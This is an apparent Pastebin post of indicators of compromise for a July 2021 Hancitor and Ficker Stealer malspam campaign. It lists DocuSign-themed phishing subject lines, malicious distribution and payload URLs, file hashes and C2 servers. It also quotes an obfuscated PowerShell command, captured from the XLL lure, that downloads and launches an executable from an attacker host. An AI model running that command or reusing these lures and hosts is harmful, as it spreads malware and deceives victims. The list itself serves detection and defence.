pandazheng

2021-07-08 Hancitor IOCs

Jul 8th, 2021
158
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. THREAT IDENTIFICATION: HANCITOR / FICKER STEALER
  2.  
  3. HANCITOR BUILD NUMBER
  4. BUILD=0707in2_wvcr
  5.  
  6. SUBJECTS OBSERVED
  7. You got invoice from DocuSign Electronic Service
  8. You got invoice from DocuSign Electronic Signature Service
  9. You got invoice from DocuSign Service
  10. You got invoice from DocuSign Signature Service
  11. You got notification from DocuSign Electronic Service
  12. You got notification from DocuSign Electronic Signature Service
  13. You got notification from DocuSign Service
  14. You got notification from DocuSign Signature Service
  15. You received invoice from DocuSign Electronic Service
  16. You received invoice from DocuSign Electronic Signature Service
  17. You received invoice from DocuSign Service
  18. You received invoice from DocuSign Signature Service
  19. You received notification from DocuSign Electronic Service
  20. You received notification from DocuSign Electronic Signature Service
  21. You received notification from DocuSign Service
  22. You received notification from DocuSign Signature Service
  23.  
  24. SENDERS OBSERVED
  25.  
  26. MALDOC PROXY DISTRIBUTION URLS
  27. http://feedproxy.google.com/~r/aadrkvpwohr/~3/hvqIAWB8ZGo/legend.php
  28. http://feedproxy.google.com/~r/aaigmlntaz/~3/zDMjq9cpjP0/purported.php
  29. http://feedproxy.google.com/~r/agrfofpkhoi/~3/Nvuc4ZHoAuU/trafficked.php
  30. http://feedproxy.google.com/~r/aoqdbq/~3/lgYeMYdoVFs/edelweiss.php
  31. http://feedproxy.google.com/~r/bcoycuchq/~3/85TxsQt3Q1A/expatiate.php
  32. http://feedproxy.google.com/~r/bfaiobxnn/~3/40BvVc5LU1I/nondestructive.php
  33. http://feedproxy.google.com/~r/ccfhf/~3/YPVRRIvUyF0/detrition.php
  34. http://feedproxy.google.com/~r/conikypz/~3/zYdenqefeFM/polemic.php
  35. http://feedproxy.google.com/~r/eapqs/~3/PXLELUQiOIM/enabled.php
  36. http://feedproxy.google.com/~r/eaxffuyn/~3/MPqSB8haPFM/pointedness.php
  37. http://feedproxy.google.com/~r/efuzvpwwuw/~3/Ju_TpdCJw7o/trover.php
  38. http://feedproxy.google.com/~r/ggwrkvfiz/~3/5AZsEWUuj0w/wrath.php
  39. http://feedproxy.google.com/~r/gidppccnezk/~3/8yvHqCvJiiA/limp.php
  40. http://feedproxy.google.com/~r/higcitfx/~3/rrnrD2uQluU/funny.php
  41. http://feedproxy.google.com/~r/huwwygzkokv/~3/3N-X0bO5epU/isle.php
  42. http://feedproxy.google.com/~r/igxzzrinx/~3/Z97ozNdjlSA/siderite.php
  43. http://feedproxy.google.com/~r/kkyknzxqa/~3/OSA0nIazKI4/presumed.php
  44. http://feedproxy.google.com/~r/lfmzx/~3/DIfbI5M9auQ/schoolmarm.php
  45. http://feedproxy.google.com/~r/mezzzkrooh/~3/gM2AilSs-2U/witnesser.php
  46. http://feedproxy.google.com/~r/oehvfutz/~3/J8P7yN6ucko/toothless.php
  47. http://feedproxy.google.com/~r/ogitcfzsl/~3/5Psg9vP0R7k/sleekness.php
  48. http://feedproxy.google.com/~r/oivbslq/~3/8sJ-OEQ-QKk/sinned.php
  49. http://feedproxy.google.com/~r/puyhr/~3/c91Mx9dCypw/tuba.php
  50. http://feedproxy.google.com/~r/qvdii/~3/lgxzfGdyDyo/greeting.php
  51. http://feedproxy.google.com/~r/reibxjjfqv/~3/YHK3BGNsq0Q/tangibly.php
  52. http://feedproxy.google.com/~r/rtiuexidp/~3/L0TOvxtMT4E/aboard.php
  53. http://feedproxy.google.com/~r/sjsovniji/~3/j9cG3K3J4SU/interpretation.php
  54. http://feedproxy.google.com/~r/slcqfyy/~3/IPa4MfWbIUs/practitioner.php
  55. http://feedproxy.google.com/~r/sxdcbtwtun/~3/CKI5VDNqNpM/versification.php
  56. http://feedproxy.google.com/~r/vmfctlny/~3/0kW56lAJalM/firmament.php
  57. http://feedproxy.google.com/~r/vtvqpysqgjx/~3/sG4SsBpOZNM/monument.php
  58. http://feedproxy.google.com/~r/wwenrdi/~3/ZVOWXtVkwCo/antimatter.php
  59. http://feedproxy.google.com/~r/ymtonk/~3/e2Kt7bOAP10/cutlass.php
  60.  
  61. MALDOC REDIRECT DOWNLOAD URLS
  62. http://an.nastena.lv/greeting.php
  63. http://catface.us/expatiate.php
  64. http://gbsports.theapplab.org/tuba.php
  65. http://gbsports.theapplab.org/wrath.php
  66. http://grecozenobi.com.ar/presumed.php
  67. http://grecozenobi.com.ar/sinned.php
  68. http://grecozenobi.com.ar/trover.php
  69. http://greechip.net/polemic.php
  70. http://gunsify.com/sleekness.php
  71. http://homevault.co.uk/aboard.php
  72. http://homevault.co.uk/enabled.php
  73. http://jaxthemessenger.com/witnesser.php
  74. http://maoptions.xyz/detrition.php
  75. http://maoptions.xyz/monument.php
  76. http://maoptions.xyz/trafficked.php
  77. http://new.novapilates.com/versification.php
  78. http://nextclickcorp.net/nondestructive.php
  79. http://nextclickcorp.net/practitioner.php
  80. http://pphc.welkinfortprojects.com/edelweiss.php
  81. http://pphc.welkinfortprojects.com/limp.php
  82. http://seatranscorp.com/cutlass.php
  83. http://seatranscorp.com/purported.php
  84. http://seatranscorp.com/toothless.php
  85. http://sportsrunouts.com/antimatter.php
  86. http://sportsrunouts.com/isle.php
  87. http://sportsrunouts.com/tangibly.php
  88. http://turquoisecoaching.co.uk/funny.php
  89. http://turquoisecoaching.co.uk/pointedness.php
  90. http://virfilms.in/interpretation.php
  91. http://virfilms.in/siderite.php
  92. http://vivo.com.pk/firmament.php
  93. https://www.adstudiophotography.com/legend.php
  94. https://www.adstudiophotography.com/schoolmarm.php
  95.  
  96. adstudiophotography.com
  97. catface.us
  98. grecozenobi.com.ar
  99. greechip.net
  100. gunsify.com
  101. homevault.co.uk
  102. jaxthemessenger.com
  103. maoptions.xyz
  104. nastena.lv
  105. nextclickcorp.net
  106. novapilates.com
  107. seatranscorp.com
  108. sportsrunouts.com
  109. theapplab.org
  110. turquoisecoaching.co.uk
  111. virfilms.in
  112. vivo.com.pk
  113. welkinfortprojects.com
  114.  
  115. MALDOC XLL FILE HASHES
  116. 0708_891792481.xll
  117. 41e0318dfdb1c180a375a7efc712649e
  118.  
  119. MALDOC DOC FILE HASHES
  120. 46b5387cedf436ebd2c0800f2e8297e2
  121. 4bdfb6932eba2bb3cbce59a2bae3cee2
  122. aec795705d76fe4e3a66adbace539656
  123. b4144d8e8e735f9a24f8c6e043438077
  124. d32db402317d36e8a207d5b5a71d6cac
  125. e071a5ed02d41002303b7e5763bfb307
  126.  
  127. HANCITOR PAYLOAD DOWNLOAD URLS
  128. (this proceeded from running the .xll file)
  129. http://srand04rf.ru/92375234.xml
  130. http://srand04rf.ru/08.jpg
  131.  
  132. HANCITOR PAYLOAD FILE HASH
  133. (as usual, this was dropped after enabling macros in the .doc file)
  134. niberius.dll
  135. 378d5008e351365908e039475b7180b0
  136.  
  137. POWERSHELL SCRIPT FROM OPENING THE XLL FILE
  138. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  139. poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg' -OuTfIle 'c:\Users\Public\snd32sys.exe';
  140. sTart 'c:\Users\Public\snd32sys.exe'
  141.  
  142. (this proceeded from running the .xll file)
  143. 92375234.xml
  144. 71999a9d2f15e164c9b1fa926aa6444b
  145.  
  146. res32.hta (same hash)
  147. 71999a9d2f15e164c9b1fa926aa6444b
  148. ----------------------------------------
  149. 08.jpg
  150. ed1921467f6784af6bdca40a06a541b5
  151.  
  152. snd32sys.exe (same hash)
  153. ed1921467f6784af6bdca40a06a541b5
  154.  
  155. HANCITOR C2
  156. http://anspossthrly.ru/8/forum.php
  157. http://sudepallon.com/8/forum.php
  158. http://thentabecon.ru/8/forum.php
  159.  
  160. FICKER STEALER DOWNLOAD URL
  161. http://srand04rf.ru/7hfjsdfjks.exe
  162.  
  163. FICKER STEALER FILE HASH
  164. 7hfjsdfjks.exe
  165. 270c3859591599642bd15167765246e3
  166.  
  167. FICKER C2
  168. http://pospvisis.com
Add Comment
Please, Sign In to add comment